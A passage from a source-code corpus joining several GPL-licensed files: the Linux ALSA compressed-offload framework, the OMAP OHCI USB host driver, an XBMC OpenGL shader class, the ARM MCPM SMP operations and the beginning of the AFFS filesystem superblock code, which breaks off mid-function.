void snd_compress_free(struct snd_card *card, struct snd_compr *compr)
{
snd_device_free(card, compr);
}
EXPORT_SYMBOL_GPL(snd_compress_free);
static int snd_compress_add_device(struct snd_compr *device)
{
int ret;
if (!device->card)
return -EINVAL;
/* register the card */
ret = snd_card_register(device->card);
if (ret)
goto out;
return 0;
out:
pr_err("failed with %d\n", ret);
return ret;
}
static int snd_compress_remove_device(struct snd_compr *device)
{
return snd_card_free(device->card);
}
/**
* snd_compress_register - register compressed device
*
* @device: compressed device to register
*/
int snd_compress_register(struct snd_compr *device)
{
int retval;
if (device->name == NULL || device->dev == NULL || device->ops == NULL)
return -EINVAL;
pr_debug("Registering compressed device %s\n", device->name);
if (snd_BUG_ON(!device->ops->open))
return -EINVAL;
if (snd_BUG_ON(!device->ops->free))
return -EINVAL;
if (snd_BUG_ON(!device->ops->set_params))
return -EINVAL;
if (snd_BUG_ON(!device->ops->trigger))
return -EINVAL;
mutex_init(&device->lock);
/* register a compressed card */
mutex_lock(&device_mutex);
retval = snd_compress_add_device(device);
mutex_unlock(&device_mutex);
return retval;
}
EXPORT_SYMBOL_GPL(snd_compress_register);
int snd_compress_deregister(struct snd_compr *device)
{
pr_debug("Removing compressed device %s\n", device->name);
mutex_lock(&device_mutex);
snd_compress_remove_device(device);
mutex_unlock(&device_mutex);
return 0;
}
EXPORT_SYMBOL_GPL(snd_compress_deregister);
static int __init snd_compress_init(void)
{
return 0;
}
static void __exit snd_compress_exit(void)
{
}
module_init(snd_compress_init);
module_exit(snd_compress_exit);
MODULE_DESCRIPTION("ALSA Compressed offload framework");
MODULE_AUTHOR("Vinod Koul <vinod.koul@linux.intel.com>");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
ska-sa/borph_linux_devel | drivers/usb/host/ohci-omap.c | 3 | 13576 | /*
* OHCI HCD (Host Controller Driver) for USB.
*
* (C) Copyright 1999 Roman Weissgaerber <weissg@vienna.at>
* (C) Copyright 2000-2005 David Brownell
* (C) Copyright 2002 Hewlett-Packard Company
*
* OMAP Bus Glue
*
* Modified for OMAP by Tony Lindgren <tony@atomide.com>
* Based on the 2.4 OMAP OHCI driver originally done by MontaVista Software Inc.
* and on ohci-sa1111.c by Christopher Hoover <ch@hpl.hp.com>
*
* This file is licenced under the GPL.
*/
#include <linux/signal.h> /* IRQF_DISABLED */
#include <linux/jiffies.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <asm/hardware.h>
#include <asm/io.h>
#include <asm/mach-types.h>
#include <asm/arch/mux.h>
#include <asm/arch/irqs.h>
#include <asm/arch/gpio.h>
#include <asm/arch/fpga.h>
#include <asm/arch/usb.h>
/* OMAP-1510 OHCI has its own MMU for DMA */
#define OMAP1510_LB_MEMSIZE 32 /* Should be same as SDRAM size */
#define OMAP1510_LB_CLOCK_DIV 0xfffec10c
#define OMAP1510_LB_MMU_CTL 0xfffec208
#define OMAP1510_LB_MMU_LCK 0xfffec224
#define OMAP1510_LB_MMU_LD_TLB 0xfffec228
#define OMAP1510_LB_MMU_CAM_H 0xfffec22c
#define OMAP1510_LB_MMU_CAM_L 0xfffec230
#define OMAP1510_LB_MMU_RAM_H 0xfffec234
#define OMAP1510_LB_MMU_RAM_L 0xfffec238
#ifndef CONFIG_ARCH_OMAP
#error "This file is OMAP bus glue. CONFIG_OMAP must be defined."
#endif
#ifdef CONFIG_TPS65010
#include <linux/i2c/tps65010.h>
#else
#define LOW 0
#define HIGH 1
#define GPIO1 1
static inline int tps65010_set_gpio_out_value(unsigned gpio, unsigned value)
{
return 0;
}
#endif
extern int usb_disabled(void);
extern int ocpi_enable(void);
static struct clk *usb_host_ck;
static struct clk *usb_dc_ck;
static int host_enabled;
static int host_initialized;
static void omap_ohci_clock_power(int on)
{
if (on) {
clk_enable(usb_dc_ck);
clk_enable(usb_host_ck);
/* guesstimate for T5 == 1x 32K clock + APLL lock time */
udelay(100);
} else {
clk_disable(usb_host_ck);
clk_disable(usb_dc_ck);
}
}
/*
* Board specific gang-switched transceiver power on/off.
* NOTE: OSK supplies power from DC, not battery.
*/
static int omap_ohci_transceiver_power(int on)
{
if (on) {
if (machine_is_omap_innovator() && cpu_is_omap1510())
fpga_write(fpga_read(INNOVATOR_FPGA_CAM_USB_CONTROL)
| ((1 << 5/*usb1*/) | (1 << 3/*usb2*/)),
INNOVATOR_FPGA_CAM_USB_CONTROL);
else if (machine_is_omap_osk())
tps65010_set_gpio_out_value(GPIO1, LOW);
} else {
if (machine_is_omap_innovator() && cpu_is_omap1510())
fpga_write(fpga_read(INNOVATOR_FPGA_CAM_USB_CONTROL)
& ~((1 << 5/*usb1*/) | (1 << 3/*usb2*/)),
INNOVATOR_FPGA_CAM_USB_CONTROL);
else if (machine_is_omap_osk())
tps65010_set_gpio_out_value(GPIO1, HIGH);
}
return 0;
}
#ifdef CONFIG_ARCH_OMAP15XX
/*
* OMAP-1510 specific Local Bus clock on/off
*/
static int omap_1510_local_bus_power(int on)
{
if (on) {
omap_writel((1 << 1) | (1 << 0), OMAP1510_LB_MMU_CTL);
udelay(200);
} else {
omap_writel(0, OMAP1510_LB_MMU_CTL);
}
return 0;
}
/*
* OMAP-1510 specific Local Bus initialization
* NOTE: This assumes 32MB memory size in OMAP1510LB_MEMSIZE.
* See also arch/mach-omap/memory.h for __virt_to_dma() and
* __dma_to_virt() which need to match with the physical
* Local Bus address below.
*/
static int omap_1510_local_bus_init(void)
{
unsigned int tlb;
unsigned long lbaddr, physaddr;
omap_writel((omap_readl(OMAP1510_LB_CLOCK_DIV) & 0xfffffff8) | 0x4,
OMAP1510_LB_CLOCK_DIV);
/* Configure the Local Bus MMU table */
for (tlb = 0; tlb < OMAP1510_LB_MEMSIZE; tlb++) {
lbaddr = tlb * 0x00100000 + OMAP1510_LB_OFFSET;
physaddr = tlb * 0x00100000 + PHYS_OFFSET;
omap_writel((lbaddr & 0x0fffffff) >> 22, OMAP1510_LB_MMU_CAM_H);
omap_writel(((lbaddr & 0x003ffc00) >> 6) | 0xc,
OMAP1510_LB_MMU_CAM_L);
omap_writel(physaddr >> 16, OMAP1510_LB_MMU_RAM_H);
omap_writel((physaddr & 0x0000fc00) | 0x300, OMAP1510_LB_MMU_RAM_L);
omap_writel(tlb << 4, OMAP1510_LB_MMU_LCK);
omap_writel(0x1, OMAP1510_LB_MMU_LD_TLB);
}
/* Enable the walking table */
omap_writel(omap_readl(OMAP1510_LB_MMU_CTL) | (1 << 3), OMAP1510_LB_MMU_CTL);
udelay(200);
return 0;
}
#else
#define omap_1510_local_bus_power(x) {}
#define omap_1510_local_bus_init() {}
#endif
#ifdef CONFIG_USB_OTG
static void start_hnp(struct ohci_hcd *ohci)
{
const unsigned port = ohci_to_hcd(ohci)->self.otg_port - 1;
unsigned long flags;
otg_start_hnp(ohci->transceiver);
local_irq_save(flags);
ohci->transceiver->state = OTG_STATE_A_SUSPEND;
writel (RH_PS_PSS, &ohci->regs->roothub.portstatus [port]);
OTG_CTRL_REG &= ~OTG_A_BUSREQ;
local_irq_restore(flags);
}
#endif
/*-------------------------------------------------------------------------*/
static int ohci_omap_init(struct usb_hcd *hcd)
{
struct ohci_hcd *ohci = hcd_to_ohci(hcd);
struct omap_usb_config *config = hcd->self.controller->platform_data;
int need_transceiver = (config->otg != 0);
int ret;
dev_dbg(hcd->self.controller, "starting USB Controller\n");
if (config->otg) {
ohci_to_hcd(ohci)->self.otg_port = config->otg;
/* default/minimum OTG power budget: 8 mA */
ohci_to_hcd(ohci)->power_budget = 8;
}
/* boards can use OTG transceivers in non-OTG modes */
need_transceiver = need_transceiver
|| machine_is_omap_h2() || machine_is_omap_h3();
if (cpu_is_omap16xx())
ocpi_enable();
#ifdef CONFIG_ARCH_OMAP_OTG
if (need_transceiver) {
ohci->transceiver = otg_get_transceiver();
if (ohci->transceiver) {
int status = otg_set_host(ohci->transceiver,
&ohci_to_hcd(ohci)->self);
dev_dbg(hcd->self.controller, "init %s transceiver, status %d\n",
ohci->transceiver->label, status);
if (status) {
if (ohci->transceiver)
put_device(ohci->transceiver->dev);
return status;
}
} else {
dev_err(hcd->self.controller, "can't find transceiver\n");
return -ENODEV;
}
}
#endif
omap_ohci_clock_power(1);
if (cpu_is_omap1510()) {
omap_1510_local_bus_power(1);
omap_1510_local_bus_init();
}
if ((ret = ohci_init(ohci)) < 0)
return ret;
/* board-specific power switching and overcurrent support */
if (machine_is_omap_osk() || machine_is_omap_innovator()) {
u32 rh = roothub_a (ohci);
/* power switching (ganged by default) */
rh &= ~RH_A_NPS;
/* TPS2045 switch for internal transceiver (port 1) */
if (machine_is_omap_osk()) {
ohci_to_hcd(ohci)->power_budget = 250;
rh &= ~RH_A_NOCP;
/* gpio9 for overcurrent detction */
omap_cfg_reg(W8_1610_GPIO9);
omap_request_gpio(9);
omap_set_gpio_direction(9, 1 /* IN */);
/* for paranoia's sake: disable USB.PUEN */
omap_cfg_reg(W4_USB_HIGHZ);
}
ohci_writel(ohci, rh, &ohci->regs->roothub.a);
distrust_firmware = 0;
} else if (machine_is_nokia770()) {
/* We require a self-powered hub, which should have
* plenty of power. */
ohci_to_hcd(ohci)->power_budget = 0;
}
/* FIXME khubd hub requests should manage power switching */
omap_ohci_transceiver_power(1);
/* board init will have already handled HMC and mux setup.
* any external transceiver should already be initialized
* too, so all configured ports use the right signaling now.
*/
return 0;
}
static void ohci_omap_stop(struct usb_hcd *hcd)
{
dev_dbg(hcd->self.controller, "stopping USB Controller\n");
omap_ohci_clock_power(0);
}
/*-------------------------------------------------------------------------*/
/**
* usb_hcd_omap_probe - initialize OMAP-based HCDs
* Context: !in_interrupt()
*
* Allocates basic resources for this USB host controller, and
* then invokes the start() method for the HCD associated with it
* through the hotplug entry's driver_data.
*/
static int usb_hcd_omap_probe (const struct hc_driver *driver,
struct platform_device *pdev)
{
int retval, irq;
struct usb_hcd *hcd = 0;
struct ohci_hcd *ohci;
if (pdev->num_resources != 2) {
printk(KERN_ERR "hcd probe: invalid num_resources: %i\n",
pdev->num_resources);
return -ENODEV;
}
if (pdev->resource[0].flags != IORESOURCE_MEM
|| pdev->resource[1].flags != IORESOURCE_IRQ) {
printk(KERN_ERR "hcd probe: invalid resource type\n");
return -ENODEV;
}
usb_host_ck = clk_get(0, "usb_hhc_ck");
if (IS_ERR(usb_host_ck))
return PTR_ERR(usb_host_ck);
if (!cpu_is_omap1510())
usb_dc_ck = clk_get(0, "usb_dc_ck");
else
usb_dc_ck = clk_get(0, "lb_ck");
if (IS_ERR(usb_dc_ck)) {
clk_put(usb_host_ck);
return PTR_ERR(usb_dc_ck);
}
hcd = usb_create_hcd (driver, &pdev->dev, pdev->dev.bus_id);
if (!hcd) {
retval = -ENOMEM;
goto err0;
}
hcd->rsrc_start = pdev->resource[0].start;
hcd->rsrc_len = pdev->resource[0].end - pdev->resource[0].start + 1;
if (!request_mem_region(hcd->rsrc_start, hcd->rsrc_len, hcd_name)) {
dev_dbg(&pdev->dev, "request_mem_region failed\n");
retval = -EBUSY;
goto err1;
}
hcd->regs = (void __iomem *) (int) IO_ADDRESS(hcd->rsrc_start);
ohci = hcd_to_ohci(hcd);
ohci_hcd_init(ohci);
host_initialized = 0;
host_enabled = 1;
irq = platform_get_irq(pdev, 0);
if (irq < 0) {
retval = -ENXIO;
goto err2;
}
retval = usb_add_hcd(hcd, irq, IRQF_DISABLED);
if (retval)
goto err2;
host_initialized = 1;
if (!host_enabled)
omap_ohci_clock_power(0);
return 0;
err2:
release_mem_region(hcd->rsrc_start, hcd->rsrc_len);
err1:
usb_put_hcd(hcd);
err0:
clk_put(usb_dc_ck);
clk_put(usb_host_ck);
return retval;
}
/* may be called with controller, bus, and devices active */
/**
* usb_hcd_omap_remove - shutdown processing for OMAP-based HCDs
* @dev: USB Host Controller being removed
* Context: !in_interrupt()
*
* Reverses the effect of usb_hcd_omap_probe(), first invoking
* the HCD's stop() method. It is always called from a thread
* context, normally "rmmod", "apmd", or something similar.
*/
static inline void
usb_hcd_omap_remove (struct usb_hcd *hcd, struct platform_device *pdev)
{
struct ohci_hcd *ohci = hcd_to_ohci (hcd);
usb_remove_hcd(hcd);
if (ohci->transceiver) {
(void) otg_set_host(ohci->transceiver, 0);
put_device(ohci->transceiver->dev);
}
if (machine_is_omap_osk())
omap_free_gpio(9);
release_mem_region(hcd->rsrc_start, hcd->rsrc_len);
usb_put_hcd(hcd);
clk_put(usb_dc_ck);
clk_put(usb_host_ck);
}
/*-------------------------------------------------------------------------*/
static int
ohci_omap_start (struct usb_hcd *hcd)
{
struct omap_usb_config *config;
struct ohci_hcd *ohci = hcd_to_ohci (hcd);
int ret;
if (!host_enabled)
return 0;
config = hcd->self.controller->platform_data;
if (config->otg || config->rwc) {
ohci->hc_control = OHCI_CTRL_RWC;
writel(OHCI_CTRL_RWC, &ohci->regs->control);
}
if ((ret = ohci_run (ohci)) < 0) {
dev_err(hcd->self.controller, "can't start\n");
ohci_stop (hcd);
return ret;
}
return 0;
}
/*-------------------------------------------------------------------------*/
static const struct hc_driver ohci_omap_hc_driver = {
.description = hcd_name,
.product_desc = "OMAP OHCI",
.hcd_priv_size = sizeof(struct ohci_hcd),
/*
* generic hardware linkage
*/
.irq = ohci_irq,
.flags = HCD_USB11 | HCD_MEMORY,
/*
* basic lifecycle operations
*/
.reset = ohci_omap_init,
.start = ohci_omap_start,
.stop = ohci_omap_stop,
.shutdown = ohci_shutdown,
/*
* managing i/o requests and associated device resources
*/
.urb_enqueue = ohci_urb_enqueue,
.urb_dequeue = ohci_urb_dequeue,
.endpoint_disable = ohci_endpoint_disable,
/*
* scheduling support
*/
.get_frame_number = ohci_get_frame,
/*
* root hub support
*/
.hub_status_data = ohci_hub_status_data,
.hub_control = ohci_hub_control,
.hub_irq_enable = ohci_rhsc_enable,
#ifdef CONFIG_PM
.bus_suspend = ohci_bus_suspend,
.bus_resume = ohci_bus_resume,
#endif
.start_port_reset = ohci_start_port_reset,
};
/*-------------------------------------------------------------------------*/
static int ohci_hcd_omap_drv_probe(struct platform_device *dev)
{
return usb_hcd_omap_probe(&ohci_omap_hc_driver, dev);
}
static int ohci_hcd_omap_drv_remove(struct platform_device *dev)
{
struct usb_hcd *hcd = platform_get_drvdata(dev);
usb_hcd_omap_remove(hcd, dev);
platform_set_drvdata(dev, NULL);
return 0;
}
/*-------------------------------------------------------------------------*/
#ifdef CONFIG_PM
static int ohci_omap_suspend(struct platform_device *dev, pm_message_t message)
{
struct ohci_hcd *ohci = hcd_to_ohci(platform_get_drvdata(dev));
if (time_before(jiffies, ohci->next_statechange))
msleep(5);
ohci->next_statechange = jiffies;
omap_ohci_clock_power(0);
ohci_to_hcd(ohci)->state = HC_STATE_SUSPENDED;
dev->dev.power.power_state = PMSG_SUSPEND;
return 0;
}
static int ohci_omap_resume(struct platform_device *dev)
{
struct ohci_hcd *ohci = hcd_to_ohci(platform_get_drvdata(dev));
if (time_before(jiffies, ohci->next_statechange))
msleep(5);
ohci->next_statechange = jiffies;
omap_ohci_clock_power(1);
dev->dev.power.power_state = PMSG_ON;
usb_hcd_resume_root_hub(platform_get_drvdata(dev));
return 0;
}
#endif
/*-------------------------------------------------------------------------*/
/*
* Driver definition to register with the OMAP bus
*/
static struct platform_driver ohci_hcd_omap_driver = {
.probe = ohci_hcd_omap_drv_probe,
.remove = ohci_hcd_omap_drv_remove,
.shutdown = usb_hcd_platform_shutdown,
#ifdef CONFIG_PM
.suspend = ohci_omap_suspend,
.resume = ohci_omap_resume,
#endif
.driver = {
.owner = THIS_MODULE,
.name = "ohci",
},
};
MODULE_ALIAS("platform:ohci");
| gpl-2.0 |
PimentNoir/xbmc | xbmc/rendering/gl/GLShader.cpp | 3 | 6095 | /*
* Copyright (C) 2005-2017 Team XBMC
* http://xbmc.org
*
* This Program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This Program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with XBMC; see the file COPYING. If not, see
* <http://www.gnu.org/licenses/>.
*
*/
#include "system.h"
#include "GLShader.h"
#include "ServiceBroker.h"
#include "utils/log.h"
#include "rendering/RenderSystem.h"
#include "guilib/GraphicContext.h"
#include "guilib/MatrixGLES.h"
using namespace Shaders;
CGLShader::CGLShader(const char *shader) : CGLSLShaderProgram("gl_shader_vert.glsl", shader)
{
m_proj = nullptr;
m_model = nullptr;
m_clipPossible = false;
}
CGLShader::CGLShader(const char *vshader, const char *fshader) : CGLSLShaderProgram(vshader, fshader)
{
m_proj = nullptr;
m_model = nullptr;
m_clipPossible = false;
}
void CGLShader::OnCompiledAndLinked()
{
// This is called after CompileAndLink()
// Variables passed directly to the Fragment shader
m_hTex0 = glGetUniformLocation(ProgramHandle(), "m_samp0");
m_hTex1 = glGetUniformLocation(ProgramHandle(), "m_samp1");
m_hUniCol = glGetUniformLocation(ProgramHandle(), "m_unicol");
// Variables passed directly to the Vertex shader
m_hProj = glGetUniformLocation(ProgramHandle(), "m_proj");
m_hModel = glGetUniformLocation(ProgramHandle(), "m_model");
// Vertex attributes
m_hPos = glGetAttribLocation(ProgramHandle(), "m_attrpos");
m_hCol = glGetAttribLocation(ProgramHandle(), "m_attrcol");
m_hCord0 = glGetAttribLocation(ProgramHandle(), "m_attrcord0");
m_hCord1 = glGetAttribLocation(ProgramHandle(), "m_attrcord1");
// It's okay to do this only one time. Textures units never change.
glUseProgram(ProgramHandle());
glUniform1i(m_hTex0, 0);
glUniform1i(m_hTex1, 1);
glUniform4f(m_hUniCol, 1.0, 1.0, 1.0, 1.0);
glUseProgram(0);
}
bool CGLShader::OnEnabled()
{
// This is called after glUseProgram()
GLfloat *projMatrix = glMatrixProject.Get().m_pMatrix;
GLfloat *modelMatrix = glMatrixModview.Get().m_pMatrix;
glUniformMatrix4fv(m_hProj, 1, GL_FALSE, projMatrix);
glUniformMatrix4fv(m_hModel, 1, GL_FALSE, modelMatrix);
const TransformMatrix &guiMatrix = g_graphicsContext.GetGUIMatrix();
CRect viewPort; // absolute positions of corners
CServiceBroker::GetRenderSystem().GetViewPort(viewPort);
/* glScissor operates in window coordinates. In order that we can use it to
* perform clipping, we must ensure that there is an independent linear
* transformation from the coordinate system used by CGraphicContext::ClipRect
* to window coordinates, separately for X and Y (in other words, no
* rotation or shear is introduced at any stage). To do, this, we need to
* check that zeros are present in the following locations:
*
* GUI matrix:
* / * 0 * * \
* | 0 * * * |
* \ 0 0 * * /
* ^ TransformMatrix::TransformX/Y/ZCoord are only ever called with
* input z = 0, so this column doesn't matter
* Model-view matrix:
* / * 0 0 * \
* | 0 * 0 * |
* | 0 0 * * |
* \ * * * * / <- eye w has no influence on window x/y (last column below
* is either 0 or ignored)
* Projection matrix:
* / * 0 0 0 \
* | 0 * 0 0 |
* | * * * * | <- normalised device coordinate z has no influence on window x/y
* \ 0 0 * 0 /
*
* Some of these zeros are not strictly required to ensure this, but they tend
* to be zeroed in the common case, so by checking for zeros here, we simplify
* the calculation of the window x/y coordinates further down the line.
*
* (Minor detail: we don't quite deal in window coordinates as defined by
* OpenGL, because CRenderSystemGLES::SetScissors flips the Y axis. But all
* that's needed to handle that is an effective negation at the stage where
* Y is in normalised device coordinates.)
*/
m_clipPossible = guiMatrix.m[0][1] == 0 &&
guiMatrix.m[1][0] == 0 &&
guiMatrix.m[2][0] == 0 &&
guiMatrix.m[2][1] == 0 &&
modelMatrix[0+1*4] == 0 &&
modelMatrix[0+2*4] == 0 &&
modelMatrix[1+0*4] == 0 &&
modelMatrix[1+2*4] == 0 &&
modelMatrix[2+0*4] == 0 &&
modelMatrix[2+1*4] == 0 &&
projMatrix[0+1*4] == 0 &&
projMatrix[0+2*4] == 0 &&
projMatrix[0+3*4] == 0 &&
projMatrix[1+0*4] == 0 &&
projMatrix[1+2*4] == 0 &&
projMatrix[1+3*4] == 0 &&
projMatrix[3+0*4] == 0 &&
projMatrix[3+1*4] == 0 &&
projMatrix[3+3*4] == 0;
m_clipXFactor = 0.0;
m_clipXOffset = 0.0;
m_clipYFactor = 0.0;
m_clipYOffset = 0.0;
if (m_clipPossible)
{
m_clipXFactor = guiMatrix.m[0][0] * modelMatrix[0+0*4] * projMatrix[0+0*4];
m_clipXOffset = (guiMatrix.m[0][3] * modelMatrix[0+0*4] + modelMatrix[0+3*4]) * projMatrix[0+0*4];
m_clipYFactor = guiMatrix.m[1][1] * modelMatrix[1+1*4] * projMatrix[1+1*4];
m_clipYOffset = (guiMatrix.m[1][3] * modelMatrix[1+1*4] + modelMatrix[1+3*4]) * projMatrix[1+1*4];
float clipW = (guiMatrix.m[2][3] * modelMatrix[2+2*4] + modelMatrix[2+3*4]) * projMatrix[3+2*4];
float xMult = (viewPort.x2 - viewPort.x1) / (2 * clipW);
float yMult = (viewPort.y1 - viewPort.y2) / (2 * clipW); // correct for inverted window coordinate scheme
m_clipXFactor = m_clipXFactor * xMult;
m_clipXOffset = m_clipXOffset * xMult + (viewPort.x2 + viewPort.x1) / 2;
m_clipYFactor = m_clipYFactor * yMult;
m_clipYOffset = m_clipYOffset * yMult + (viewPort.y2 + viewPort.y1) / 2;
}
return true;
}
void CGLShader::Free()
{
// Do Cleanup here
CGLSLShaderProgram::Free();
}
| gpl-2.0 |
raininja/android_kernel_asus_a500cg | arch/arm/common/mcpm_platsmp.c | 2051 | 2211 | /*
* linux/arch/arm/mach-vexpress/mcpm_platsmp.c
*
* Created by: Nicolas Pitre, November 2012
* Copyright: (C) 2012-2013 Linaro Limited
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Code to handle secondary CPU bringup and hotplug for the cluster power API.
*/
#include <linux/init.h>
#include <linux/smp.h>
#include <linux/spinlock.h>
#include <asm/mcpm.h>
#include <asm/smp.h>
#include <asm/smp_plat.h>
static void __init simple_smp_init_cpus(void)
{
}
static int __cpuinit mcpm_boot_secondary(unsigned int cpu, struct task_struct *idle)
{
unsigned int mpidr, pcpu, pcluster, ret;
extern void secondary_startup(void);
mpidr = cpu_logical_map(cpu);
pcpu = MPIDR_AFFINITY_LEVEL(mpidr, 0);
pcluster = MPIDR_AFFINITY_LEVEL(mpidr, 1);
pr_debug("%s: logical CPU %d is physical CPU %d cluster %d\n",
__func__, cpu, pcpu, pcluster);
mcpm_set_entry_vector(pcpu, pcluster, NULL);
ret = mcpm_cpu_power_up(pcpu, pcluster);
if (ret)
return ret;
mcpm_set_entry_vector(pcpu, pcluster, secondary_startup);
arch_send_wakeup_ipi_mask(cpumask_of(cpu));
dsb_sev();
return 0;
}
static void __cpuinit mcpm_secondary_init(unsigned int cpu)
{
mcpm_cpu_powered_up();
}
#ifdef CONFIG_HOTPLUG_CPU
static int mcpm_cpu_disable(unsigned int cpu)
{
/*
* We assume all CPUs may be shut down.
* This would be the hook to use for eventual Secure
* OS migration requests as described in the PSCI spec.
*/
return 0;
}
static void mcpm_cpu_die(unsigned int cpu)
{
unsigned int mpidr, pcpu, pcluster;
mpidr = read_cpuid_mpidr();
pcpu = MPIDR_AFFINITY_LEVEL(mpidr, 0);
pcluster = MPIDR_AFFINITY_LEVEL(mpidr, 1);
mcpm_set_entry_vector(pcpu, pcluster, NULL);
mcpm_cpu_power_down();
}
#endif
static struct smp_operations __initdata mcpm_smp_ops = {
.smp_init_cpus = simple_smp_init_cpus,
.smp_boot_secondary = mcpm_boot_secondary,
.smp_secondary_init = mcpm_secondary_init,
#ifdef CONFIG_HOTPLUG_CPU
.cpu_disable = mcpm_cpu_disable,
.cpu_die = mcpm_cpu_die,
#endif
};
void __init mcpm_smp_set_ops(void)
{
smp_set_ops(&mcpm_smp_ops);
}
| gpl-2.0 |
aosp-armani/kernel_msm_armani | fs/affs/super.c | 4611 | 14957 | /*
* linux/fs/affs/inode.c
*
* (c) 1996 Hans-Joachim Widmaier - Rewritten
*
* (C) 1993 Ray Burr - Modified for Amiga FFS filesystem.
*
* (C) 1992 Eric Youngdale Modified for ISO 9660 filesystem.
*
* (C) 1991 Linus Torvalds - minix filesystem
*/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/statfs.h>
#include <linux/parser.h>
#include <linux/magic.h>
#include <linux/sched.h>
#include <linux/slab.h>
#include "affs.h"
extern struct timezone sys_tz;
static int affs_statfs(struct dentry *dentry, struct kstatfs *buf);
static int affs_remount (struct super_block *sb, int *flags, char *data);
static void
affs_commit_super(struct super_block *sb, int wait, int clean)
{
struct affs_sb_info *sbi = AFFS_SB(sb);
struct buffer_head *bh = sbi->s_root_bh;
struct affs_root_tail *tail = AFFS_ROOT_TAIL(sb, bh);
tail->bm_flag = cpu_to_be32(clean);
secs_to_datestamp(get_seconds(), &tail->disk_change);
affs_fix_checksum(sb, bh);
mark_buffer_dirty(bh);
if (wait)
sync_dirty_buffer(bh);
}
static void
affs_put_super(struct super_block *sb)
{
struct affs_sb_info *sbi = AFFS_SB(sb);
pr_debug("AFFS: put_super()\n");
if (!(sb->s_flags & MS_RDONLY) && sb->s_dirt)
affs_commit_super(sb, 1, 1);
kfree(sbi->s_prefix);
affs_free_bitmap(sb);
affs_brelse(sbi->s_root_bh);
kfree(sbi);
sb->s_fs_info = NULL;
}
static void
affs_write_super(struct super_block *sb)
{
lock_super(sb);
if (!(sb->s_flags & MS_RDONLY))
affs_commit_super(sb, 1, 2);
sb->s_dirt = 0;
unlock_super(sb);
pr_debug("AFFS: write_super() at %lu, clean=2\n", get_seconds());
}
static int
affs_sync_fs(struct super_block *sb, int wait)
{
lock_super(sb);
affs_commit_super(sb, wait, 2);
sb->s_dirt = 0;
unlock_super(sb);
return 0;
}
static struct kmem_cache * affs_inode_cachep;
static struct inode *affs_alloc_inode(struct super_block *sb)
{
struct affs_inode_info *i;
i = kmem_cache_alloc(affs_inode_cachep, GFP_KERNEL);
if (!i)
return NULL;
i->vfs_inode.i_version = 1;
i->i_lc = NULL;
i->i_ext_bh = NULL;
i->i_pa_cnt = 0;
return &i->vfs_inode;
}
static void affs_i_callback(struct rcu_head *head)
{
struct inode *inode = container_of(head, struct inode, i_rcu);
kmem_cache_free(affs_inode_cachep, AFFS_I(inode));
}
static void affs_destroy_inode(struct inode *inode)
{
call_rcu(&inode->i_rcu, affs_i_callback);
}
static void init_once(void *foo)
{
struct affs_inode_info *ei = (struct affs_inode_info *) foo;
sema_init(&ei->i_link_lock, 1);
sema_init(&ei->i_ext_lock, 1);
inode_init_once(&ei->vfs_inode);
}
static int init_inodecache(void)
{
affs_inode_cachep = kmem_cache_create("affs_inode_cache",
sizeof(struct affs_inode_info),
0, (SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD),
init_once);
if (affs_inode_cachep == NULL)
return -ENOMEM;
return 0;
}
static void destroy_inodecache(void)
{
kmem_cache_destroy(affs_inode_cachep);
}
static const struct super_operations affs_sops = {
.alloc_inode = affs_alloc_inode,
.destroy_inode = affs_destroy_inode,
.write_inode = affs_write_inode,
.evict_inode = affs_evict_inode,
.put_super = affs_put_super,
.write_super = affs_write_super,
.sync_fs = affs_sync_fs,
.statfs = affs_statfs,
.remount_fs = affs_remount,
.show_options = generic_show_options,
};
enum {
Opt_bs, Opt_mode, Opt_mufs, Opt_prefix, Opt_protect,
Opt_reserved, Opt_root, Opt_setgid, Opt_setuid,
Opt_verbose, Opt_volume, Opt_ignore, Opt_err,
};
static const match_table_t tokens = {
{Opt_bs, "bs=%u"},
{Opt_mode, "mode=%o"},
{Opt_mufs, "mufs"},
{Opt_prefix, "prefix=%s"},
{Opt_protect, "protect"},
{Opt_reserved, "reserved=%u"},
{Opt_root, "root=%u"},
{Opt_setgid, "setgid=%u"},
{Opt_setuid, "setuid=%u"},
{Opt_verbose, "verbose"},
{Opt_volume, "volume=%s"},
{Opt_ignore, "grpquota"},
{Opt_ignore, "noquota"},
{Opt_ignore, "quota"},
{Opt_ignore, "usrquota"},
{Opt_err, NULL},
};
static int
parse_options(char *options, uid_t *uid, gid_t *gid, int *mode, int *reserved, s32 *root,
int *blocksize, char **prefix, char *volume, unsigned long *mount_opts)
{
char *p;
substring_t args[MAX_OPT_ARGS];
/* Fill in defaults */
*uid = current_uid();
*gid = current_gid();
*reserved = 2;
*root = -1;
*blocksize = -1;
volume[0] = ':';
volume[1] = 0;
*mount_opts = 0;
if (!options)
return 1;
while ((p = strsep(&options, ",")) != NULL) {
int token, n, option;
if (!*p)
continue;
token = match_token(p, tokens, args);
switch (token) {
case Opt_bs:
if (match_int(&args[0], &n))
return 0;
if (n != 512 && n != 1024 && n != 2048
&& n != 4096) {
printk ("AFFS: Invalid blocksize (512, 1024, 2048, 4096 allowed)\n");
return 0;
}
*blocksize = n;
break;
case Opt_mode:
if (match_octal(&args[0], &option))
return 0;
*mode = option & 0777;
*mount_opts |= SF_SETMODE;
break;
case Opt_mufs:
*mount_opts |= SF_MUFS;
break;
case Opt_prefix:
*prefix = match_strdup(&args[0]);
if (!*prefix)
return 0;
*mount_opts |= SF_PREFIX;
break;
case Opt_protect:
*mount_opts |= SF_IMMUTABLE;
break;
case Opt_reserved:
if (match_int(&args[0], reserved))
return 0;
break;
case Opt_root:
if (match_int(&args[0], root))
return 0;
break;
case Opt_setgid:
if (match_int(&args[0], &option))
return 0;
*gid = option;
*mount_opts |= SF_SETGID;
break;
case Opt_setuid:
if (match_int(&args[0], &option))
return 0;
*uid = option;
*mount_opts |= SF_SETUID;
break;
case Opt_verbose:
*mount_opts |= SF_VERBOSE;
break;
case Opt_volume: {
char *vol = match_strdup(&args[0]);
if (!vol)
return 0;
